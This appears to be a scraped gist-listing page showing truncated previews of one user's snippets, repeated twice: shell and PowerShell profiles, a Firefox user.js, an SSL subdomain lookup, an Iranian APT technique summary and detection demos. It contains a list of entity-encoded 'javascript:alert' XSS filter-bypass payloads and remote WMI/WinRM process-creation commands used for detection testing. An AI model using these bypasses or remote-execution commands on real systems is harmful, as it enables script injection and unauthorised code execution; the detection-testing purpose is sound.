maravedi

## script-template.sh
#!/usr/bin/env bash

set -Eeuo pipefail
trap cleanup SIGINT SIGTERM ERR EXIT

script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd -P)

usage() {
  cat <<EOF
Usage: $(basename "${BASH_SOURCE[0]}") [-h] [-v] [-f] -p param_value arg1 [arg2...]

## href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

## sslsub.sh
function sslsub() {
  timeout 3 openssl s_client -showcerts -servername $1 -connect $1:443 <<< "Q"  2>/dev/null | openssl x509 -text -noout | grep DNS | tr ',' '\n' | cut -d ':' -f 2 | sort -fu
}

## user.js
// Mozilla User Preferences
// To change a preference value, you can either:
// - modify it via the UI (e.g. via about:config in the browser); or
// - set it within a user.js file in your profile (create it if it doesn't exist).
//
// Profile folder location on different systems:
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default

## retry.py
#Copyright 2021 Fabian Bosler

# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom
# the Software is furnished to do so, subject to the following conditions:

# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.

## Microsoft.PowerShell_profile.ps1
# %UserProfile%\Documents\PowerShell\Microsoft.PowerShell_profile.ps1

Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
if (-not [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::LeftCtrl))
{
    Import-Module posh-git
    Import-Module Pscx
}

## iranian_apit_groups_possible_commands.md

      
              1 file
            
          
              36 forks
            
          
              0 comments
            
          
              98 stars
            
          
                MSAdministrator
                / iranian_apit_groups_possible_commands.md
            
            
              Last active
              April 10, 2024 14:30
            
              
                Iranian APT Groups & Possible Commands Used By These Groups
              
          
    Overview

The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:

APT33
APT34
APT39
Charming Kitten


## twittermute.txt
Mute these words in your settings here: https://twitter.com/settings/muted_keywords

ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet

## HowToDetectTechniqueX_Demos.ps1
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe

Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe

$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession

winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword

## attack-to-csv.py
from stix2 import FileSystemSource
from stix2 import Filter
from stix2.utils import get_type_from_id

fs = FileSystemSource('./enterprise-attack')

def get_group_by_alias(src):
    return src.query([
        Filter('type', '=', 'intrusion-set'),
    ])
	#!/usr/bin/env bash

	set -Eeuo pipefail
	trap cleanup SIGINT SIGTERM ERR EXIT

	script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd -P)

	usage() {
	cat <<EOF
	Usage: $(basename "${BASH_SOURCE[0]}") [-h] [-v] [-f] -p param_value arg1 [arg2...]
	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)
	function sslsub() {
	timeout 3 openssl s_client -showcerts -servername $1 -connect $1:443 <<< "Q" 2>/dev/null \| openssl x509 -text -noout \| grep DNS \| tr ',' '\n' \| cut -d ':' -f 2 \| sort -fu
	}
	// Mozilla User Preferences
	// To change a preference value, you can either:
	// - modify it via the UI (e.g. via about:config in the browser); or
	// - set it within a user.js file in your profile (create it if it doesn't exist).
	//
	// Profile folder location on different systems:
	// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
	// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
	// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default
	#Copyright 2021 Fabian Bosler

	# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation
	# files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy,
	# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom
	# the Software is furnished to do so, subject to the following conditions:

	# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
	# Software.
	# %UserProfile%\Documents\PowerShell\Microsoft.PowerShell_profile.ps1

	Add-Type -AssemblyName WindowsBase
	Add-Type -AssemblyName PresentationCore
	if (-not [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::LeftCtrl))
	{
	Import-Module posh-git
	Import-Module Pscx
	}
	Mute these words in your settings here: https://twitter.com/settings/muted_keywords

	ActivityTweet
	generic_activity_highlights
	generic_activity_momentsbreaking
	RankedOrganicTweet
	suggest_activity
	suggest_activity_feed
	suggest_activity_highlights
	suggest_activity_tweet
	#region Attack validations
	wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe

	Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe

	$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
	Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
	$CimSession \| Remove-CimSession

	winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
	from stix2 import FileSystemSource
	from stix2 import Filter
	from stix2.utils import get_type_from_id

	fs = FileSystemSource('./enterprise-attack')

	def get_group_by_alias(src):
	return src.query([
	Filter('type', '=', 'intrusion-set'),
	])